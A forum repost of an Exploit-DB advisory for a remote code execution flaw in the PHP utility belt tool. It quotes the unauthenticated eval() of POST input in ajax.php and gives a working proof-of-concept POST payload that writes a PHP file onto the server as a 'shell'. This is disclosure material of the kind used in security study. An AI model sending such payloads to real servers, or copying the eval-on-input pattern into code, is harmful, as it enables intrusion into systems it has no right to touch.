Massaro Posted December 9, 2015 Report Posted December 9, 2015 Exploit Title : PHP utility belt Remote Code Execution vulnerabilityAuthor : WICSDate : 8/12/2015Software Link : https://github.com/mboynes/php-utility-beltOverview:PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it.ajax.php is accessible without any authentication Vulnerable code (Line number 12 to 15)if ( isset( $_POST['code'] ) ) { if ( false === eval( $_POST['code'] ) ) echo 'PHP Error encountered, execution halted';}POCAccess URL http://127.0.0.1/php-utility-belt/ajax.phpin Post data type code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>');above code will generate info.php file which will display php infoShell link will be http://127.0.0.1/php-utility-belt/info.phpSursa: https://www.exploit-db.com/exploits/38901/. Quote